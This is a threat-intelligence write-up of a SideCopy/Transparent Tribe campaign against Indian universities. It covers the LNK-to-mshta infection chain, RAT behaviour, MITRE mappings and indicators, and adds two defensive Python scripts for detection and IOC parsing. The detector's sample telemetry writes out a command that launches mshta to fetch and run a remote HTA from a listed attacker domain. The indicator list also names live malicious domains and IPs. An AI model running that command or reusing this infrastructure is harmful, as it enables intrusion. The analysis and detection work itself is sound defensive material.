The Overlapping Cyber Strategies of Transparent Tribe and SideCopy Against India

Cyble researchers uncovered a campaign in which SideCopy and Transparent Tribe tooling overlap, targeting India. The multistage infection chain starts with a spam email that leads to a malicious website, which serves a LNK file that launches mshta.exe; loader DLLs then deploy Reverse RAT and Action RAT. The operation uses university-themed lure documents, DLL side-loading, and HTTP(S) C2 communication, and shows how versatile and persistent the South Asian threat landscape remains. Hashtags: #SideCopy #TransparentTribe #ReverseRAT #ActionRAT #LNK #HTA #MSHTA #IndianUniversities #India

Keypoints

  • CRIL (Cyble Research and Intelligence Labs) identified a SideCopy APT campaign linked to Transparent Tribe that focuses on India and, in particular, on Indian universities.
  • The infection chain begins with spam emails linking to a malicious site that hosts files.zip and a lure document under themed folders such as “survey” and “economy.”
  • Initial access relies on a Shortcut (LNK) file named “IT Trends.docx.lnk” that launches mshta.exe to fetch and run an HTA payload.
  • The loader DLL (PreBotHta.dll) is carried as Base64 data inside the HTA, decoded and deserialized via ActiveX, and then used to drop the lure document and launch the final payloads, Reverse RAT and Action RAT.
  • The RAT payloads communicate with their C2 servers over HTTP(S) and support a broad command set (file, registry and process operations, USB handling, and screenshots).
  • The loader checks which antivirus product is installed (Kaspersky, Avast/AVG/Avira, Quick) and chooses its persistence and execution path accordingly; a routine named DoUSBWork handles data theft from USB drives.
  • IOCs include multiple domains, IPs, file hashes, LNK/HTA names, and DLLs (e.g., MSFTEDIT.dll, PreBotHta.dll) used across the campaign.
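
The chain in the key points above (LNK file, command prompt, mshta.exe fetching a remote HTA from one of the listed domains) is what a detection engineer would want to see on process-creation telemetry. The script below is an added example, not code from Cyble's report: the EVENTS records are constructed to look like Sysmon Event ID 1 process-creation events, the domains come from this page's IOC section, and every path, process ID, command line, and the https scheme on the payload URL are assumptions.

```python
"""Flag the LNK -> cmd.exe -> mshta.exe chain on process-creation telemetry.

Added example, not code from Cyble's report. EVENTS is constructed to look
like Sysmon Event ID 1 records (pid, parent pid, image path, command line);
the domains come from this page's IOC list, every path and command line is
an assumption.
"""
import re

# Domains taken from the IOC section of this page.
C2_DOMAINS = {"reviewassignment.online", "reviewassignment.in", "dns1.indianblog.xyz"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Constructed sample telemetry (not real captures).
EVENTS = [
    {"pid": 4312, "ppid": 2210, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Assumed form of the LNK target: a cmd.exe one-liner that starts mshta with a remote HTA.
    {"pid": 5120, "ppid": 4312, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c start "" mshta.exe https://reviewassignment.online/files/backup/ap.txt'},
    {"pid": 5131, "ppid": 5120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://reviewassignment.online/files/backup/ap.txt"},
    # Benign control case: a vendor installer running a local HTA straight from explorer.
    {"pid": 6001, "ppid": 4312, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]


def image_name(path):
    """Lower-cased basename of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_mshta_chain(events):
    """Return one finding per mshta.exe process that shows the campaign's traits.

    mshta.exe on its own is too noisy to alert on, so a finding needs at least
    one of: a cmd.exe parent (what the LNK's command line produces) or an HTA
    fetched from a remote URL. A URL host on the C2 list adds a third reason,
    and two or more reasons raise the severity to high.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "mshta.exe":
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent is not None and image_name(parent["image"]) == "cmd.exe":
            reasons.append("parent is cmd.exe")
        m = URL_RE.search(e["cmdline"])
        if m:
            host = m.group(1).lower()
            reasons.append("HTA loaded from remote URL")
            if host in C2_DOMAINS:
                reasons.append("URL host matches known C2 domain " + host)
        if reasons:
            findings.append({
                "pid": e["pid"],
                "severity": "high" if len(reasons) > 1 else "medium",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in detect_mshta_chain(EVENTS):
        print(f"pid {f['pid']} [{f['severity']}]: " + "; ".join(f["reasons"]))
```

Run against the constructed events, the script raises one high-severity finding for pid 5131 (cmd.exe parent, remote HTA, known C2 host) and stays silent on the locally sourced HTA started from explorer.exe. The parent check matters because a bare "mshta.exe with a URL" rule fires on some legitimate deployment tooling; requiring the cmd.exe hop or a C2 host match keeps the rule tied to this campaign's tradecraft.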

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The .lnk file launches a command prompt that starts mshta.exe, which then connects to the payload URL listed in the IOCs. Quote: “…the .lnk file triggers a command prompt prompting the launch of “mshta.exe,” which then connects to the URL below.”
  • [T1053] Scheduled Task/Job – Listed in the source mapping, but the behavior it is backed by (adding a program to a startup folder or referencing it from a Registry Run key) is Registry Run Keys / Startup Folder (T1547.001), which appears separately below; the page gives no evidence of a scheduled task. Quote: “persistence by adding a program to a startup folder or referencing it with a Registry run key.”
  • [T1047] Windows Management Instrumentation – Checks if Antivirus program is installed (via WMI). Quote: “Checks if Antivirus program is installed (via WMI)”
  • [T1547.001] Registry Run Keys / Startup Folder – Startup persistence via shortcuts in startup folder. Quote: “Startup folder to ensure persistence”
  • [T1574.002] DLL Side-Loading – The malware loads the malicious DLL (PreBotHta.dll) through side-loading. Quote: “DLL Side-Loading” and “launch of PreBotHTta.dll”
  • [T1027] Obfuscated/Encrypted Files or Information – Base64-encoded payloads embedded in HTA/dynamic strings. Quote: “Base64-encoded strings” and “encoded in Base64 format.”
  • [T1027.002] Software Packing – Packaged/packed payloads within HTA/DLL workflows. Quote: “packed or crypted data” (Software Packing).
  • [T1140] Deobfuscate/Decode Files or Information – Base64 decoding of embedded payloads before writing to disk. Quote: “decodes the concatenated strings using the FromBase64Transform”
  • [T1112] Modify Registry – Uses reg.exe to modify the Windows registry for persistence. Quote: “Modify Registry” in table.
  • [T1082] System Information Discovery – Queries system information (host name, IP, OS, etc.). Quote: “sends a POST request with various system information” and “System Information Discovery” in table.
  • [T1083] File and Directory Discovery – Stealer enumerates files/directories during operations. Quote: “directories and files in a specified directory” in table.
  • [T1518.001] Security Software Discovery – Checks antivirus presence via WMI. Quote: “Security Software Discovery (T1518.001) – Checks if Antivirus program is installed (via WMI)”
  • [T1071] Application Layer Protocol (tactic TA0011, Command and Control) – The RATs communicate with their C2 servers over HTTP(S). Quote: “Malware exe communicate to C&C server.”
  • [T1105] Ingress Tool Transfer – Downloads additional payloads from web servers. Quote: “Downloads files from webservers via HTTP.”

Indicators of Compromise

  • [Domain] reviewassignment.online, reviewassignment.in – Malicious sites used in the campaign
  • [IP] 67.223.118.135, 64.188.27.144 – C2/C2-related infrastructure
  • [MD5] 6e02fe7c188c417802008e147c248eb1 – Shortcut (LNK) file
  • [SHA256] bc1acdca196f1ff72722243be2afe1429b88122afb9d4852d6d6e57689411d3d – Shortcut (LNK) file
  • [MD5] 80ac09458e5e5fbd8e500ef0f7313bd2 – 1.hta
  • [MD5] 614896fea882b17b193b41d4e3e593ac – MSFTEDIT.dll (Action RAT); 32 hex characters, so an MD5 digest rather than the SHA256 the source table labels it
  • [MD5] 5fc7a9d515067008095a439837881713 – PreBotHta.dll (stage 1)
  • [MD5] 565cac3dffde44fa487014e69b13140a – PreBotHta.dll (Reverse RAT 2.0); 32 hex characters, so an MD5 digest rather than the SHA256 the source table labels it
  • [URL] reviewassignment.online/files/backup/ap.txt – Payload URL (scheme not given in the source)
  • [URL] hxxps://dns1.indianblog.xyz/dailyworkout – ReverseRAT/C2
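
IOC lists like the one above usually get pasted into a blocklist by hand, and mislabelled hash types (a 32-character digest tagged SHA256) or defanged URLs (hxxps, [.]) silently break that. The script below is an added example, not tooling from Cyble's report: it parses bullet lines in the format used on this page, classifies each digest by its length regardless of the label, refangs URLs, and extracts the hosts for a domain blocklist. IOC_LINES is constructed from this page's IOC section; the MSFTEDIT.dll entry is deliberately labelled SHA256 with a 32-character digest so the label check has something to report.

```python
"""Turn the IOC bullet list above into a machine-usable blocklist.

Added example, not tooling from the report. IOC_LINES is constructed from
this page's IOC section; the MSFTEDIT.dll entry is deliberately labelled
SHA256 although its digest is 32 hex characters, so the label check has
something to report.
"""
import re

HASH_LEN = {32: "MD5", 40: "SHA1", 64: "SHA256"}
# "[Label] value1, value2 – description" (en-dash or hyphen as separator)
LINE_RE = re.compile(r"^\[(\w+)\]\s+(.+?)\s+[–-]\s+(.*)$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

IOC_LINES = [
    "[Domain] reviewassignment.online, reviewassignment.in – Malicious sites",
    "[IP] 67.223.118.135, 64.188.27.144 – C2 infrastructure",
    "[MD5] 6e02fe7c188c417802008e147c248eb1 – Shortcut (LNK) file",
    "[SHA256] bc1acdca196f1ff72722243be2afe1429b88122afb9d4852d6d6e57689411d3d – Shortcut (LNK) file",
    "[SHA256] 614896fea882b17b193b41d4e3e593ac – MSFTEDIT.dll (label deliberately wrong)",
    "[URL] reviewassignment.online/files/backup/ap.txt – Payload URL",
    "[URL] hxxps://dns1.indianblog.xyz/dailyworkout – ReverseRAT C2",
]


def refang(value):
    """Undo the usual defanging (hxxp, [.]) so the value can be matched against logs."""
    value = re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.IGNORECASE)
    return value.replace("[.]", ".")


def host_of(url):
    """Host part of a URL, with or without a scheme."""
    return url.split("://", 1)[-1].split("/", 1)[0].lower()


def parse_iocs(lines):
    """Parse bullet lines into sets of domains, IPs, URLs and hashes, with warnings."""
    out = {"domains": set(), "ips": set(), "urls": set(), "hashes": {}, "warnings": []}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        label, values, _description = m.groups()
        label = label.upper()
        for value in (v.strip() for v in values.split(",")):
            if label in HASH_LEN.values():
                # Trust the digest length, not the label, and report disagreements.
                actual = HASH_LEN.get(len(value)) if HEX_RE.match(value) else None
                if actual is None:
                    out["warnings"].append(f"{value}: not a recognised hex digest")
                    continue
                if actual != label:
                    out["warnings"].append(f"{value}: labelled {label} but length says {actual}")
                out["hashes"].setdefault(actual, set()).add(value.lower())
            elif label == "IP":
                out["ips"].add(value)
            elif label in ("DOMAIN", "URL"):
                value = refang(value)
                if label == "URL" or "/" in value:
                    out["urls"].add(value)
                out["domains"].add(host_of(value))   # every URL host also joins the domain list
            else:
                out["warnings"].append(f"{value}: unknown label {label}")
    return out


if __name__ == "__main__":
    result = parse_iocs(IOC_LINES)
    for kind in ("domains", "ips", "urls"):
        print(kind, sorted(result[kind]))
    for algo, digests in result["hashes"].items():
        print(algo, sorted(digests))
    for w in result["warnings"]:
        print("WARNING", w)
```

The length check is the point: a SHA256-labelled entry with a 32-character value lands in the MD5 set and produces a warning instead of being fed to a SHA256 lookup that can never match. Hosts are pulled from every URL as well, because the ap.txt path is only useful to a proxy, while the domain is what a DNS resolver or firewall blocks.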

Read more: https://cyble.com/blog/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/